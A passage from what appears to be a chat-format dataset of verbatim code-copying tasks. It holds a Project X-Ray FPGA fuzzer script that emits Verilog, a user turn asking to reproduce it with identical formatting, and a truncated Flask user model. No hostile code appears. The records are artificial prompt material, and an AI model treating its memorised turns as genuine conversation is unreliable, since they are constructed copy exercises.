lutc (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[2]),\n .O6(lutno6[2]));\n\n (* LOC=LOC, BEL=\"B6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_CAFE_0000_0001)\n ) lutb (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[1]),\n .O6(lutno6[1]));\n\n generate if (ALUT_SRL != 0) begin\n\n (* LOC=LOC, BEL=\"A6LUT\", KEEP, DONT_TOUCH *)\n\tSRLC32E #(\n\t\t.INIT(64'h8000_1CE0_0000_0001)\n\t) srla (\n .CLK(clk),\n .CE(din[6]),\n .D(din[5]),\n\t\t.A(din[4:0]),\n\t\t.Q(lutno6[0]),\n .Q31(mc31));\n\n assign lutno5[0] = din[6];\n\n end else begin\n\n (* LOC=LOC, BEL=\"A6LUT\", KEEP, DONT_TOUCH *)\n\tLUT6_2 #(\n\t\t.INIT(64'h8000_1CE0_0000_0001)\n\t) luta (\n\t\t.I0(din[0]),\n\t\t.I1(din[1]),\n\t\t.I2(din[2]),\n\t\t.I3(din[3]),\n\t\t.I4(din[4]),\n\t\t.I5(din[5]),\n\t\t.O5(lutno5[0]),\n\t\t.O6(lutno6[0]));\n\n end endgenerate\n\n //Outputs do not have to be used, will stay without them\n (* LOC=LOC, KEEP, DONT_TOUCH *)\n CARRY4 carry4(.O(caro_all), .CO(carco_all), .DI(lutno5), .S(lutno6), .CYINIT(1'b0), .CI());\n\n generate\n if (N == 3) begin\n (* LOC=LOC, BEL=\"DFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 2) begin\n (* LOC=LOC, BEL=\"CFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 1) begin\n (* LOC=LOC, BEL=\"BFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 0) begin\n (* LOC=LOC, BEL=\"AFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n endgenerate\nendmodule\n\n//******************************************************************************\n//BFFMUX tests\n\nmodule clb_NFFMUX_AX (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n\n /*\n D: DX\n drawn a little differently\n not a mux control\n becomes a dedicated external signal\n C: CX\n B: BX\n A: AX\n */\n wire ax = din[6]; //used on MUX8:S, MUX7A:S, and MUX7B:S\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(ax));\n\nendmodule\n\nmodule clb_NFFMUX_CY (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire carco;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(carco),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(carco));\nendmodule\n\nmodule clb_NFFMUX_F78 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire lut8o, lut7bo, lut7ao;\n\n /*\n D: N/A (no such mux position)\n C: F7B:O\n B: F8:O\n A: F7A:O\n */\n wire ff_d;\n\n generate\n if (N == 3) begin\n //No muxes, so this is undefined\n invalid_configuration invalid_configuration3();\n end else if (N == 2) begin\n assign ff_d = lut7bo;\n end else if (N == 1) begin\n assign ff_d = lut8o;\n end else if (N == 0) begin\n assign ff_d = lut7ao;\n end\n endgenerate\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(lut8o), .lut7bo(lut7bo), .lut7ao(lut7ao),\n .caro(), .carco(),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(ff_d));\nendmodule\n\nmodule clb_NFFMUX_O5 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire bo5;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(bo5), .bo6(),\n .ff_q(dout[0]),\n .ff_d(bo5));\nendmodule\n\nmodule clb_NFFMUX_O6 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire bo6;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(), .bo6(bo6),\n .ff_q(dout[0]),\n .ff_d(bo6));\nendmodule\n\nmodule clb_NFFMUX_XOR (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire caro;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(caro), .carco(),\n .bo5(), .bo6(bo6),\n .ff_q(dout[0]),\n .ff_d(caro));\nendmodule\n\nmodule clb_NFFMUX_MC31 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1; // Dummy\n wire mc31;\n\n myLUT8 #(.LOC(LOC), .N(3), .ALUT_SRL(1))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(caro), .carco(),\n .bo5(), .bo6(bo6),\n .mc31(mc31),\n .ff_q(dout[0]),\n .ff_d(mc31));\nendmodule\n''')\n```",
"role": "user"
}
] |
[
{
"content": "Recreate the entire code block with identical formatting:\n<|memory_start|>```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2017-2020 The Project X-Ray Authors.\n#\n# Use of this source code is governed by a ISC-style\n# license that can be found in the LICENSE file or at\n# https://opensource.org/licenses/ISC\n#\n# SPDX-License-Identifier: ISC\nimport os, random\nrandom.seed(0)\nfrom prjxray import util\nfrom prjxray import verilog\n\n# INCREMENT is the amount of additional CLBN to be instantiated in the design.\n# This makes the fuzzer compilation more robust against failures.\nINCREMENT = os.getenv('CLBN', 0)\nCLBN = 600 + int(INCREMENT)\nprint('//Requested CLBs: %s' % str(CLBN))\n\n\ndef gen_slicels():\n for _tile_name, site_name, _site_type in util.get_roi().gen_sites(\n ['SLICEL']):\n yield site_name\n\n\ndef gen_slicems():\n for _tile_name, site_name, _site_type in util.get_roi().gen_sites(\n ['SLICEM']):\n yield site_name\n\n\nDIN_N = CLBN * 8\nDOUT_N = CLBN * 8\n\nverilog.top_harness(DIN_N, DOUT_N)\n\nf = open('params.csv', 'w')\nf.write('module,loc,n\\n')\nslicels = gen_slicels()\nslicems = gen_slicems()\nprint(\n 'module roi(input clk, input [%d:0] din, output [%d:0] dout);' %\n (DIN_N - 1, DOUT_N - 1))\nfor i in range(CLBN):\n\n use_slicem = (i % 2) == 0\n\n if use_slicem:\n loc = next(slicems)\n variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR', 'MC31']\n else:\n loc = next(slicels)\n variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR']\n\n modules = ['clb_NFFMUX_' + x for x in variants]\n module = random.choice(modules)\n\n if module == 'clb_NFFMUX_MC31':\n n = 3 # Only DOUTMUX has MC31 input\n elif module == 'clb_NFFMUX_F78':\n n = random.randint(0, 2)\n else:\n n = random.randint(0, 3)\n\n print(' %s' % module)\n print(' #(.LOC(\"%s\"), .N(%d))' % (loc, n))\n print(\n ' clb_%d (.clk(clk), .din(din[ %d +: 8]), .dout(dout[ %d +: 8]));'\n % (i, 8 * i, 8 * i))\n\n f.write('%s,%s,%s\\n' % (module, loc, n))\nf.close()\nprint(\n '''endmodule\n\n// ---------------------------------------------------------------------\n\n''')\n\nprint(\n '''\nmodule myLUT8 (input clk, input [7:0] din,\n output lut8o, output lut7bo, output lut7ao,\n //caro: XOR additional result (main output)\n //carco: CLA result (carry module additional output)\n output caro, output carco,\n output bo5, output bo6,\n output wire mc31,\n output wire ff_q, //always connect to output\n input wire ff_d); //mux output net\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n parameter ALUT_SRL=0;\n\n wire [3:0] caro_all;\n assign caro = caro_all[N];\n wire [3:0] carco_all;\n assign carco = carco_all[N];\n\n wire [3:0] lutno6;\n wire [3:0] lutno5;\n assign bo5 = lutno5[N];\n assign bo6 = lutno6[N];\n\n //Outputs does not have to be used, will stay without it\n (* LOC=LOC, BEL=\"F8MUX\", KEEP, DONT_TOUCH *)\n MUXF8 mux8 (.O(lut8o), .I0(lut7bo), .I1(lut7ao), .S(din[6]));\n (* LOC=LOC, BEL=\"F7BMUX\", KEEP, DONT_TOUCH *)\n MUXF7 mux7b (.O(lut7bo), .I0(lutno6[3]), .I1(lutno6[2]), .S(din[6]));\n (* LOC=LOC, BEL=\"F7AMUX\", KEEP, DONT_TOUCH *)\n MUXF7 mux7a (.O(lut7ao), .I0(lutno6[1]), .I1(lutno6[0]), .S(din[6]));\n\n (* LOC=LOC, BEL=\"D6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_DEAD_0000_0001)\n ) lutd (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[3]),\n .O6(lutno6[3]));\n\n (* LOC=LOC, BEL=\"C6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_BEEF_0000_0001)\n ) lutc (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[2]),\n .O6(lutno6[2]));\n\n (* LOC=LOC, BEL=\"B6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_CAFE_0000_0001)\n ) lutb (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[1]),\n .O6(lutno6[1]));\n\n generate if (ALUT_SRL != 0) begin\n\n (* LOC=LOC, BEL=\"A6LUT\", KEEP, DONT_TOUCH *)\n\tSRLC32E #(\n\t\t.INIT(64'h8000_1CE0_0000_0001)\n\t) srla (\n .CLK(clk),\n .CE(din[6]),\n .D(din[5]),\n\t\t.A(din[4:0]),\n\t\t.Q(lutno6[0]),\n .Q31(mc31));\n\n assign lutno5[0] = din[6];\n\n end else begin\n\n (* LOC=LOC, BEL=\"A6LUT\", KEEP, DONT_TOUCH *)\n\tLUT6_2 #(\n\t\t.INIT(64'h8000_1CE0_0000_0001)\n\t) luta (\n\t\t.I0(din[0]),\n\t\t.I1(din[1]),\n\t\t.I2(din[2]),\n\t\t.I3(din[3]),\n\t\t.I4(din[4]),\n\t\t.I5(din[5]),\n\t\t.O5(lutno5[0]),\n\t\t.O6(lutno6[0]));\n\n end endgenerate\n\n //Outputs do not have to be used, will stay without them\n (* LOC=LOC, KEEP, DONT_TOUCH *)\n CARRY4 carry4(.O(caro_all), .CO(carco_all), .DI(lutno5), .S(lutno6), .CYINIT(1'b0), .CI());\n\n generate\n if (N == 3) begin\n (* LOC=LOC, BEL=\"DFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 2) begin\n (* LOC=LOC, BEL=\"CFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 1) begin\n (* LOC=LOC, BEL=\"BFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n if (N == 0) begin\n (* LOC=LOC, BEL=\"AFF\", KEEP, DONT_TOUCH *)\n FDPE bff (\n .C(clk),\n .Q(ff_q),\n .CE(1'b1),\n .PRE(1'b0),\n .D(ff_d));\n end\n endgenerate\nendmodule\n\n//******************************************************************************\n//BFFMUX tests\n\nmodule clb_NFFMUX_AX (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n\n /*\n D: DX\n drawn a little differently\n not a mux control\n becomes a dedicated external signal\n C: CX\n B: BX\n A: AX\n */\n wire ax = din[6]; //used on MUX8:S, MUX7A:S, and MUX7B:S\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(ax));\n\nendmodule\n\nmodule clb_NFFMUX_CY (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire carco;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(carco),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(carco));\nendmodule\n\nmodule clb_NFFMUX_F78 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire lut8o, lut7bo, lut7ao;\n\n /*\n D: N/A (no such mux position)\n C: F7B:O\n B: F8:O\n A: F7A:O\n */\n wire ff_d;\n\n generate\n if (N == 3) begin\n //No muxes, so this is undefined\n invalid_configuration invalid_configuration3();\n end else if (N == 2) begin\n assign ff_d = lut7bo;\n end else if (N == 1) begin\n assign ff_d = lut8o;\n end else if (N == 0) begin\n assign ff_d = lut7ao;\n end\n endgenerate\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(lut8o), .lut7bo(lut7bo), .lut7ao(lut7ao),\n .caro(), .carco(),\n .bo5(), .bo6(),\n .ff_q(dout[0]),\n .ff_d(ff_d));\nendmodule\n\nmodule clb_NFFMUX_O5 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire bo5;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(bo5), .bo6(),\n .ff_q(dout[0]),\n .ff_d(bo5));\nendmodule\n\nmodule clb_NFFMUX_O6 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire bo6;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(), .carco(),\n .bo5(), .bo6(bo6),\n .ff_q(dout[0]),\n .ff_d(bo6));\nendmodule\n\nmodule clb_NFFMUX_XOR (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n wire caro;\n\n myLUT8 #(.LOC(LOC), .N(N))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(caro), .carco(),\n .bo5(), .bo6(bo6),\n .ff_q(dout[0]),\n .ff_d(caro));\nendmodule\n\nmodule clb_NFFMUX_MC31 (input clk, input [7:0] din, output [7:0] dout);\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1; // Dummy\n wire mc31;\n\n myLUT8 #(.LOC(LOC), .N(3), .ALUT_SRL(1))\n myLUT8(.clk(clk), .din(din),\n .lut8o(),\n .caro(caro), .carco(),\n .bo5(), .bo6(bo6),\n .mc31(mc31),\n .ff_q(dout[0]),\n .ff_d(mc31));\nendmodule\n''')\n```<|memory_end|>",
"role": "user"
}
] |
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import os, random
random.seed(0)
from prjxray import util
from prjxray import verilog
# INCREMENT is the amount of additional CLBN to be instantiated in the design.
# This makes the fuzzer compilation more robust against failures.
INCREMENT = os.getenv('CLBN', 0)
CLBN = 600 + int(INCREMENT)
print('//Requested CLBs: %s' % str(CLBN))
def gen_slicels():
for _tile_name, site_name, _site_type in util.get_roi().gen_sites(
['SLICEL']):
yield site_name
def gen_slicems():
for _tile_name, site_name, _site_type in util.get_roi().gen_sites(
['SLICEM']):
yield site_name
DIN_N = CLBN * 8
DOUT_N = CLBN * 8
verilog.top_harness(DIN_N, DOUT_N)
f = open('params.csv', 'w')
f.write('module,loc,n\n')
slicels = gen_slicels()
slicems = gen_slicems()
print(
'module roi(input clk, input [%d:0] din, output [%d:0] dout);' %
(DIN_N - 1, DOUT_N - 1))
for i in range(CLBN):
use_slicem = (i % 2) == 0
if use_slicem:
loc = next(slicems)
variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR', 'MC31']
else:
loc = next(slicels)
variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR']
modules = ['clb_NFFMUX_' + x for x in variants]
module = random.choice(modules)
if module == 'clb_NFFMUX_MC31':
n = 3 # Only DOUTMUX has MC31 input
elif module == 'clb_NFFMUX_F78':
n = random.randint(0, 2)
else:
n = random.randint(0, 3)
print(' %s' % module)
print(' #(.LOC("%s"), .N(%d))' % (loc, n))
print(
' clb_%d (.clk(clk), .din(din[ %d +: 8]), .dout(dout[ %d +: 8]));'
% (i, 8 * i, 8 * i))
f.write('%s,%s,%s\n' % (module, loc, n))
f.close()
print(
'''endmodule
// ---------------------------------------------------------------------
''')
print(
'''
module myLUT8 (input clk, input [7:0] din,
output lut8o, output lut7bo, output lut7ao,
//caro: XOR additional result (main output)
//carco: CLA result (carry module additional output)
output caro, output carco,
output bo5, output bo6,
output wire mc31,
output wire ff_q, //always connect to output
input wire ff_d); //mux output net
parameter LOC="SLICE_FIXME";
parameter N=-1;
parameter ALUT_SRL=0;
wire [3:0] caro_all;
assign caro = caro_all[N];
wire [3:0] carco_all;
assign carco = carco_all[N];
wire [3:0] lutno6;
wire [3:0] lutno5;
assign bo5 = lutno5[N];
assign bo6 = lutno6[N];
//Outputs does not have to be used, will stay without it
(* LOC=LOC, BEL="F8MUX", KEEP, DONT_TOUCH *)
MUXF8 mux8 (.O(lut8o), .I0(lut7bo), .I1(lut7ao), .S(din[6]));
(* LOC=LOC, BEL="F7BMUX", KEEP, DONT_TOUCH *)
MUXF7 mux7b (.O(lut7bo), .I0(lutno6[3]), .I1(lutno6[2]), .S(din[6]));
(* LOC=LOC, BEL="F7AMUX", KEEP, DONT_TOUCH *)
MUXF7 mux7a (.O(lut7ao), .I0(lutno6[1]), .I1(lutno6[0]), .S(din[6]));
(* LOC=LOC, BEL="D6LUT", KEEP, DONT_TOUCH *)
LUT6_2 #(
.INIT(64'h8000_DEAD_0000_0001)
) lutd (
.I0(din[0]),
.I1(din[1]),
.I2(din[2]),
.I3(din[3]),
.I4(din[4]),
.I5(din[5]),
.O5(lutno5[3]),
.O6(lutno6[3]));
(* LOC=LOC, BEL="C6LUT", KEEP, DONT_TOUCH *)
LUT6_2 #(
.INIT(64'h8000_BEEF_0000_0001)
) lutc (
.I0(din[0]),
.I1(din[1]),
.I2(din[2]),
.I3(din[3]),
.I4(din[4]),
.I5(din[5]),
.O5(lutno5[2]),
.O6(lutno6[2]));
(* LOC=LOC, BEL="B6LUT", KEEP, DONT_TOUCH *)
LUT6_2 #(
.INIT(64'h8000_CAFE_0000_0001)
) lutb (
.I0(din[0]),
.I1(din[1]),
.I2(din[2]),
.I3(din[3]),
.I4(din[4]),
.I5(din[5]),
.O5(lutno5[1]),
.O6(lutno6[1]));
generate if (ALUT_SRL != 0) begin
(* LOC=LOC, BEL="A6LUT", KEEP, DONT_TOUCH *)
SRLC32E #(
.INIT(64'h8000_1CE0_0000_0001)
) srla (
.CLK(clk),
.CE(din[6]),
.D(din[5]),
.A(din[4:0]),
.Q(lutno6[0]),
.Q31(mc31));
assign lutno5[0] = din[6];
end else begin
(* LOC=LOC, BEL="A6LUT", KEEP, DONT_TOUCH *)
LUT6_2 #(
.INIT(64'h8000_1CE0_0000_0001)
) luta (
.I0(din[0]),
.I1(din[1]),
.I2(din[2]),
.I3(din[3]),
.I4(din[4]),
.I5(din[5]),
.O5(lutno5[0]),
.O6(lutno6[0]));
end endgenerate
//Outputs do not have to be used, will stay without them
(* LOC=LOC, KEEP, DONT_TOUCH *)
CARRY4 carry4(.O(caro_all), .CO(carco_all), .DI(lutno5), .S(lutno6), .CYINIT(1'b0), .CI());
generate
if (N == 3) begin
(* LOC=LOC, BEL="DFF", KEEP, DONT_TOUCH *)
FDPE bff (
.C(clk),
.Q(ff_q),
.CE(1'b1),
.PRE(1'b0),
.D(ff_d));
end
if (N == 2) begin
(* LOC=LOC, BEL="CFF", KEEP, DONT_TOUCH *)
FDPE bff (
.C(clk),
.Q(ff_q),
.CE(1'b1),
.PRE(1'b0),
.D(ff_d));
end
if (N == 1) begin
(* LOC=LOC, BEL="BFF", KEEP, DONT_TOUCH *)
FDPE bff (
.C(clk),
.Q(ff_q),
.CE(1'b1),
.PRE(1'b0),
.D(ff_d));
end
if (N == 0) begin
(* LOC=LOC, BEL="AFF", KEEP, DONT_TOUCH *)
FDPE bff (
.C(clk),
.Q(ff_q),
.CE(1'b1),
.PRE(1'b0),
.D(ff_d));
end
endgenerate
endmodule
//******************************************************************************
//BFFMUX tests
module clb_NFFMUX_AX (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
/*
D: DX
drawn a little differently
not a mux control
becomes a dedicated external signal
C: CX
B: BX
A: AX
*/
wire ax = din[6]; //used on MUX8:S, MUX7A:S, and MUX7B:S
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(), .carco(),
.bo5(), .bo6(),
.ff_q(dout[0]),
.ff_d(ax));
endmodule
module clb_NFFMUX_CY (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
wire carco;
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(), .carco(carco),
.bo5(), .bo6(),
.ff_q(dout[0]),
.ff_d(carco));
endmodule
module clb_NFFMUX_F78 (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
wire lut8o, lut7bo, lut7ao;
/*
D: N/A (no such mux position)
C: F7B:O
B: F8:O
A: F7A:O
*/
wire ff_d;
generate
if (N == 3) begin
//No muxes, so this is undefined
invalid_configuration invalid_configuration3();
end else if (N == 2) begin
assign ff_d = lut7bo;
end else if (N == 1) begin
assign ff_d = lut8o;
end else if (N == 0) begin
assign ff_d = lut7ao;
end
endgenerate
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(lut8o), .lut7bo(lut7bo), .lut7ao(lut7ao),
.caro(), .carco(),
.bo5(), .bo6(),
.ff_q(dout[0]),
.ff_d(ff_d));
endmodule
module clb_NFFMUX_O5 (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
wire bo5;
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(), .carco(),
.bo5(bo5), .bo6(),
.ff_q(dout[0]),
.ff_d(bo5));
endmodule
module clb_NFFMUX_O6 (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
wire bo6;
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(), .carco(),
.bo5(), .bo6(bo6),
.ff_q(dout[0]),
.ff_d(bo6));
endmodule
module clb_NFFMUX_XOR (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1;
wire caro;
myLUT8 #(.LOC(LOC), .N(N))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(caro), .carco(),
.bo5(), .bo6(bo6),
.ff_q(dout[0]),
.ff_d(caro));
endmodule
module clb_NFFMUX_MC31 (input clk, input [7:0] din, output [7:0] dout);
parameter LOC="SLICE_FIXME";
parameter N=-1; // Dummy
wire mc31;
myLUT8 #(.LOC(LOC), .N(3), .ALUT_SRL(1))
myLUT8(.clk(clk), .din(din),
.lut8o(),
.caro(caro), .carco(),
.bo5(), .bo6(bo6),
.mc31(mc31),
.ff_q(dout[0]),
.ff_d(mc31));
endmodule
''')
```
|
[
{
"content": "```python\nfrom datetime import datetime\nimport hashlib\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom flask import current_app\nfrom flask.ext.login import UserMixin, AnonymousUserMixin\nfrom .. import db, login_manager\n\n\nclass Permission:\n ADMINISTER = 0x80\n\n\nclass Role(db.Model):\n __tablename__ = 'roles'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n default = db.Column(db.Boolean, default=False, index=True)\n permissions = db.Column(db.Integer)\n users = db.relationship('User', backref='role', lazy='dynamic')\n\n @staticmethod\n def insert_roles():\n roles = {\n 'User': (0x00, True),\n 'Administrator': (0xff, False)\n }\n for r in roles:\n role = Role.query.filter_by(name=r).first()\n if role is None:\n role = Role(name=r)\n role.permissions = roles[r][0]\n role.default = roles[r][1]\n db.session.add(role)\n db.session.commit()\n\n def __repr__(self):\n return '<Role %r>' % self.name\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(64), unique=True, index=True)\n role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))\n password_hash = db.Column(db.String(128))\n confirmed = db.Column(db.Boolean, default=False)\n name = db.Column(db.String(64))\n location = db.Column(db.String(64))\n about_me = db.Column(db.Text())\n member_since = db.Column(db.DateTime(), default=datetime.utcnow)\n last_seen = db.Column(db.DateTime(), default=datetime.utcnow)\n connections = db.relationship('Connection',\n backref=db.backref('user', lazy='joined'), cascade=\"all\")\n estimates = db.relationship(\"Estimate\", backref='user')\n\n @staticmethod\n def generate_fake(count=100):\n from sqlalchemy.exc import IntegrityError\n from random import seed\n import forgery_py\n\n seed()\n for i in range(count):\n u = User(email=forgery_py.internet.email_address(),\n password=forgery_py.lorem_ipsum.word(),\n confirmed=True,\n name=forgery_py.name.full_name(),\n location=forgery_py.address.city(),\n about_me=forgery_py.lorem_ipsum.sentence(),\n member_since=forgery_py.date.date(True))\n db.session.add(u)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n def __init__(self, **kwargs):\n super(User, self).__init__(**kwargs)\n if self.role is None:\n self.role = Role.query.filter_by(default=True).first()\n\n @property\n def password(self):\n raise AttributeError('password is not a readable attribute')\n\n @password.setter\n def password(self, password):\n self.password_hash = generate_password_hash(password)\n\n def verify_password(self, password):\n return check_password_hash(self.password_hash, password)\n\n def generate_confirmation_token(self, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'confirm': self.id})\n\n def confirm(self, token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('confirm') != self.id:\n return False\n self.confirmed = True\n db.session.add(self)\n return True\n\n def generate_reset_token(self, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'reset': self.id})\n\n def reset_password(self, token, new_password):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('reset') != self.id:\n return False\n self.password = new_password\n db.session.add(self)\n return True\n\n def generate_email_change_token(self, new_email, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'change_email': self.id, 'new_email': new_email})\n\n def change_email(self, token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('change_email') != self.id:\n return False\n new_email = data.get('new_email')\n if new_email is None:\n return False\n if self.query.filter_by(email=new_email).first() is not None:\n return False\n self.email = new_email\n db.session.add(self)\n return True\n\n def can(self, permissions):\n return self.role is not None and \\\n (self.role.permissions & permissions) == permissions\n\n def is_administrator(self):\n return self.can(Permission.ADMINISTER)\n\n def ping(self):\n self.last_seen = datetime.utcnow()\n db.session.add(self)\n\n def to_json(self):\n json_user = {\n 'member_since': self.member_since,\n 'last_seen': self.last_seen,\n }\n return json_user\n\n def generate_auth_token(self, expiration):\n s = Serializer(current_app.config['SECRET_KEY'],\n expires_in=expiration)\n return s.dumps({'id': self.id}).decode('ascii')\n\n @staticmethod\n def verify_auth_token(token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return None\n return User.query.get(data['id'])\n\n def __repr__(self):\n return '<User %r>' % self.email\n\n\nclass AnonymousUser(AnonymousUserMixin):\n def can(self, permissions):\n return False\n\n def is_administrator(self):\n return False\n\nclass Connection(db.Model):\n __tablename__ = \"connections\"\n id = db.Column(db.Integer, primary_key=True)\n user_id = 